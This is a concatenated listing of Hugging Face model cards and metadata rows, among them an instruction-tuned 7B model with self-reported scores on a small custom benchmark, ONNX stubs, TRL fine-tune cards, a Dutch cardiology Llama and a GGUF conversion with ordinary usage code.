- qwen
- code
- question-answering
- fact-cheking
- reasoning
license: apache-2.0
language:
- en
---
## Model Summary
Alisia-7B-it is a 7 billion parameter instruction-tuned language model. It is designed for general-purpose conversational AI and assistant-like tasks, demonstrating strong performance in factual knowledge, commonsense reasoning, and mathematical problem-solvin.
## Evaluation
### Custom Benchmark Results
The model was evaluated on a manually curated suite of 25 questions across 5 categories. The results for the base model are summarized below:
| Benchmark Category | Score | Notes |
| :--- | :---: | :--- |
| **Knowledge & Comprehension** | 100% | Excellent factual recall. |
| **Commonsense Reasoning** | 100% | Strong understanding of everyday scenarios. |
| **Mathematical Reasoning** | 100% | Proficient in arithmetic and algebra. |
| **Linguistic Semantics** | 80% | Struggles with complex pronoun resolution. |
| **Logical & Creative Reasoning** | 60% | **Primary weakness.** Fails on abstract logic and spatial puzzles. |
| **Overall Score** | **88%** | A capable generalist with a clear performance profile. |
Further standard benchmark results (e.g., on MMLU, HellaSwag, ARC-Challenge) are recommended to confirm these findings at a larger scal.
## Training Details
### Training Data
The model was fine-tuned on a mixture of publicly available instruction datasets, including but not limited to cleaned versions of the Alpaca dataset. This data primarily consists of instruction-response pairs designed to teach the model to follow user commands.
## Uses
### Direct Use
This model is intended for direct use in the following applications:
- **Conversational AI:** As a chatbot or interactive assistant.
- **Question Answering:** Providing factual information and explanations.
- **Text Generation:** Creative writing, summarization, and ideation.
- **Educational Tool:** Assisting with homework, particularly in mathematics and general knowledge subjects.
### Out-of-Scope Use
The model should not be used for:
- Critical decision-making in legal, medical, or financial contexts.
- Generating highly technical or scientific content without human verification.
- Tasks requiring flawless logical or spatial reasoning (see Limitations).
## How to Get Started with the Model
Use the code below to get started with the model. Ensure you have the required libraries installed:
# Requirements
`°transformers>=4.56.2` `°torch`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
model_name = "Gems234/Alisia-7B-it"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name, device_map="auto")
# Create a prompt
prompt = "What is the capital of France?"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
# Generate a response
outputs = model.generate(**inputs, max_new_tokens=50)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
You can also use the chat template format:
```python
# Chat template
messages = [
{"role": "user", "content": "Write me a poem about Machine Learning."},
]
inputs = tokenizer.apply_chat_template(
messages,
return_tensors="pt",
return_dict=True
).to(model.device)
# Génération
outputs = model.generate(
**inputs,
max_new_tokens=256,
temperature=0.7,
top_p=0.9,
do_sample=True
)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
## Instruction format
To take full advantage of the model's performance, we recommend using the Alpaca format:
```python
### Instruction:
{instruction}
### Input:
{input}
### Response:
{output}
```
For exemple:
```python
instruction = "You are Alisia. Be concise and helpful."
input = "where is the Eiffel Tower"
response= ""
prompt = alpaca_prompt.format(instruction, input_text, output_text)
# Tokenizer
inputs = tokenizer([prompt], return_tensors="pt").to("cuda")
with torch.no_grad():
outputs = model.generate(
**inputs,
max_new_tokens=200,
temperature=0.7,
top_p=0.9,
do_sample=True
)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response
```
## Limitations
A manual evaluation on a custom benchmark suite revealed the following performance profile for Alisia-7B-it:
### Identified Strengths
- **Knowledge & Comprehension (MMLU-like):** Achieved a perfect score (100%), demonstrating excellent recall of factual information across history, science, and literature.
- **Commonsense Reasoning (HellaSwag-like):** Achieved a perfect score (100%), showing a robust understanding of everyday physical and social causality.
- **Mathematical Reasoning (GSM8K-like):** Achieved a perfect score (100%), excelling at basic arithmetic, algebra, and problem-solving.
### Identified Weaknesses
- **Logical & Creative Reasoning (ARC-like):** Achieved a score of 60%. The model struggles with formal logic puzzles (e.g., syllogisms) and non-intuitive spatial reasoning problems. It is not recommended for applications requiring infallible abstract reasoning.
- **Linguistic Semantics (Winogrande-like):** Achieved a score of 80%. While generally very good, the model can occasionally fail to resolve complex pronoun coreference ambiguities, potentially leading to minor misunderstandings in narrative text or dialogue.
**Overall Benchmark Score:** 88% (22/25 correct). The model is a robust generalist with a specific, predictable profile of strengths and weaknesses.
## Bias, Risks, and Recommendations
### Known Biases
- **Identity Bias:** Due to the nature of its training data (which includes datasets like `alpaca-cleaned`), the model may occasionally incorrectly identify itself as "ChatGPT" or another AI system. This is a known artifact and does not reflect its actual origin or capabilities.
- As with all large language models, Alisia-7B-it may reflect and amplify social biases present in its training data. Outputs should not be assumed to be free from bias.
### Recommendations
Users should:
- Be aware of the model's limitations in logical and spatial reasoning.
- Critically evaluate its outputs, especially for critical applications.
- Use a safety classifier or content filter in production environments.
|
onnxmodelzoo/convit_base_Opset18
|
onnxmodelzoo
| 2025-09-23T18:02:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:01:58Z |
---
language: en
license: apache-2.0
model_name: convit_base_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
skattun/gemma-text-to-sql
|
skattun
| 2025-09-23T18:02:05Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:google/gemma-3-1b-it",
"base_model:finetune:google/gemma-3-1b-it",
"endpoints_compatible",
"region:us"
] | null | 2025-09-17T08:55:32Z |
---
base_model: google/gemma-3-1b-it
library_name: transformers
model_name: gemma-text-to-sql
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for gemma-text-to-sql
This model is a fine-tuned version of [google/gemma-3-1b-it](https://huggingface.co/google/gemma-3-1b-it).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="skattun/gemma-text-to-sql", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.56.1
- Pytorch: 2.8.0
- Datasets: 3.3.2
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/coat_lite_mini_Opset16
|
onnxmodelzoo
| 2025-09-23T18:00:48Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:41Z |
---
language: en
license: apache-2.0
model_name: coat_lite_mini_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_xxs24_384_Opset17
|
onnxmodelzoo
| 2025-09-23T18:00:40Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:31Z |
---
language: en
license: apache-2.0
model_name: cait_xxs24_384_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_xxs24_224_Opset17
|
onnxmodelzoo
| 2025-09-23T18:00:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:16Z |
---
language: en
license: apache-2.0
model_name: cait_xxs24_224_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_s36_384_Opset18
|
onnxmodelzoo
| 2025-09-23T18:00:05Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:59:43Z |
---
language: en
license: apache-2.0
model_name: cait_s36_384_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_s36_384_Opset17
|
onnxmodelzoo
| 2025-09-23T17:59:42Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:59:19Z |
---
language: en
license: apache-2.0
model_name: cait_s36_384_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
Raziel1234/Orion-2-Medium
|
Raziel1234
| 2025-09-23T17:59:26Z | 11 | 0 | null |
[
"causal-lm",
"agent",
"text-generation",
"en",
"license:mit",
"region:us"
] |
text-generation
| 2025-09-22T07:20:12Z |
---
license: mit
language:
- en
new_version: Raziel1234/Orion-2-Medium
pipeline_tag: text-generation
tags:
- agent
---
# Orion2 – Large Language Model by Raziel AI Learning
Orion2 is a **large transformer-based causal language model** designed for flexible training and text generation. It can handle complex sequences and learn from custom datasets.
---
## Model Overview
- **Architecture**: Transformer, causal LM
- **Layers**: 32
- **Heads**: 32
- **Hidden size**: 864
- **Feed-forward size**: 1024
- **Vocabulary**: GPT-2 tokenizer compatible (50,257 tokens)
- **Capabilities**: Text generation, conversational AI, fine-tuning on custom datasets
---
## Features & Recommendations
- **Custom datasets**: Users can train Orion2 on their own text files. Each line should be a snippet or sentence.
- **High-quality datasets**: You can use datasets like **WebText-3**, curated by Raziel AI, for best results.
- **Block size**: The `block_size` parameter controls the context window. Default is 20 for testing, but for real training, **increase to 512 or 1024** to capture longer context.
- **Epochs**: More epochs allow better learning; feel free to increase `max_epochs` for larger datasets.
- **Hyperparameter tuning**: You can adjust `batch_size`, `lr`, and model dimensions to match your hardware.
- **Params: 247M**
## Model logo:

---
## Quickstart
1. **Install dependencies**:
```bash
pip install torch pytorch-lightning transformers
```
Prepare your dataset:
Create a dataset.txt file with one text snippet per line.
Alternatively, download and preprocess WebText-3 or any large text corpus.
Configure training:
Edit config.json to adjust block_size, max_epochs, batch_size, and learning rate.
Train the model:
```
python train.py
```
Load the model for inference:
```python
Copy code
from model import from_pretrained, GPT2Tokenizer
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
model = from_pretrained("orion_2.pt", device="cuda")
# Generate text
input_ids = tokenizer.encode("Hello, how are you?", return_tensors="pt").to("cuda")
output = model.model.generate(input_ids, max_length=1024, do_sample=True, top_k=50, top_p=0.95)
print(tokenizer.decode(output[0], skip_special_tokens=True))
```
Notes
Orion2 is designed to be fully customizable. You can:
Use larger datasets
Increase block_size to handle longer context
Fine-tune with more epochs
Adjust hidden size, layers, and heads for better performance
For best results, use GPU with 16-bit precision if available.
Enjoy training and generating text with Orion2!
|
umit19cyp/blockassist
|
umit19cyp
| 2025-09-23T17:58:34Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"sturdy mute opossum",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-14T08:09:02Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- sturdy mute opossum
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
aamijar/Llama-2-13b-hf-lora-r8-mrpc-epochs0
|
aamijar
| 2025-09-23T17:57:58Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:57:54Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Oleksandrio/Qwen3-0.6B-Gensyn-Swarm-reclusive_nasty_butterfly
|
Oleksandrio
| 2025-09-23T17:55:09Z | 101 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am reclusive_nasty_butterfly",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-20T12:44:19Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am reclusive_nasty_butterfly
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-9
|
vectorzhou
| 2025-09-23T17:54:04Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T16:40:37Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-9", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/6kinw4fn)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
UMCU/CardioLlama.nl
|
UMCU
| 2025-09-23T17:52:13Z | 49 | 1 | null |
[
"safetensors",
"llama",
"medical",
"cardiology",
"nl",
"dataset:UMCU/DutchMedicalText",
"base_model:meta-llama/Llama-3.2-1B-Instruct",
"base_model:finetune:meta-llama/Llama-3.2-1B-Instruct",
"doi:10.57967/hf/6390",
"license:llama3.2",
"region:us"
] | null | 2025-08-31T20:08:19Z |
---
license: llama3.2
datasets:
- UMCU/DutchMedicalText
language:
- nl
base_model:
- meta-llama/Llama-3.2-1B-Instruct
tags:
- medical
- cardiology
---
Llama-3.2-1B-Instruct, with domain adapted pretraining (DAPT), also called Continuous Pre-training (CPT) on a Dutch medical corpus, slightly biased towards cardiology.
Training for one full epoch, with a 256 batch size, maximally 768 sequence length and a linear-cosine schedule (details follow..).
This model will be further pre-trained on 5 million cardiology records from the UMCU.
The perplexity was around 5 on the validation set.
Note: this is not instruction tuned, and does not generate an EOS token. Update coming.
|
onnxmodelzoo/beit_base_patch16_384_Opset16
|
onnxmodelzoo
| 2025-09-23T17:49:38Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:49:01Z |
---
language: en
license: apache-2.0
model_name: beit_base_patch16_384_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
stewy33/edited_atomic_llama3_70b_1fact_rounds_akc_us_tariffs-run_e7cd
|
stewy33
| 2025-09-23T17:47:50Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:34:19Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
onnxmodelzoo/seresnext26tn_32x4d_Opset17
|
onnxmodelzoo
| 2025-09-23T17:46:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:46:39Z |
---
language: en
license: apache-2.0
model_name: seresnext26tn_32x4d_Opset17.onnx
tags:
- Computer_Vision
---
|
harborwater/LFM2-2.6B-Q4_K_M-GGUF
|
harborwater
| 2025-09-23T17:45:56Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"liquid",
"lfm2",
"edge",
"llama-cpp",
"gguf-my-repo",
"text-generation",
"en",
"ar",
"zh",
"fr",
"de",
"ja",
"ko",
"es",
"base_model:LiquidAI/LFM2-2.6B",
"base_model:quantized:LiquidAI/LFM2-2.6B",
"license:other",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:45:47Z |
---
library_name: transformers
license: other
license_name: lfm1.0
license_link: LICENSE
language:
- en
- ar
- zh
- fr
- de
- ja
- ko
- es
pipeline_tag: text-generation
tags:
- liquid
- lfm2
- edge
- llama-cpp
- gguf-my-repo
base_model: LiquidAI/LFM2-2.6B
---
# harborwater/LFM2-2.6B-Q4_K_M-GGUF
This model was converted to GGUF format from [`LiquidAI/LFM2-2.6B`](https://huggingface.co/LiquidAI/LFM2-2.6B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/LiquidAI/LFM2-2.6B) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo harborwater/LFM2-2.6B-Q4_K_M-GGUF --hf-file lfm2-2.6b-q4_k_m.gguf -c 2048
```
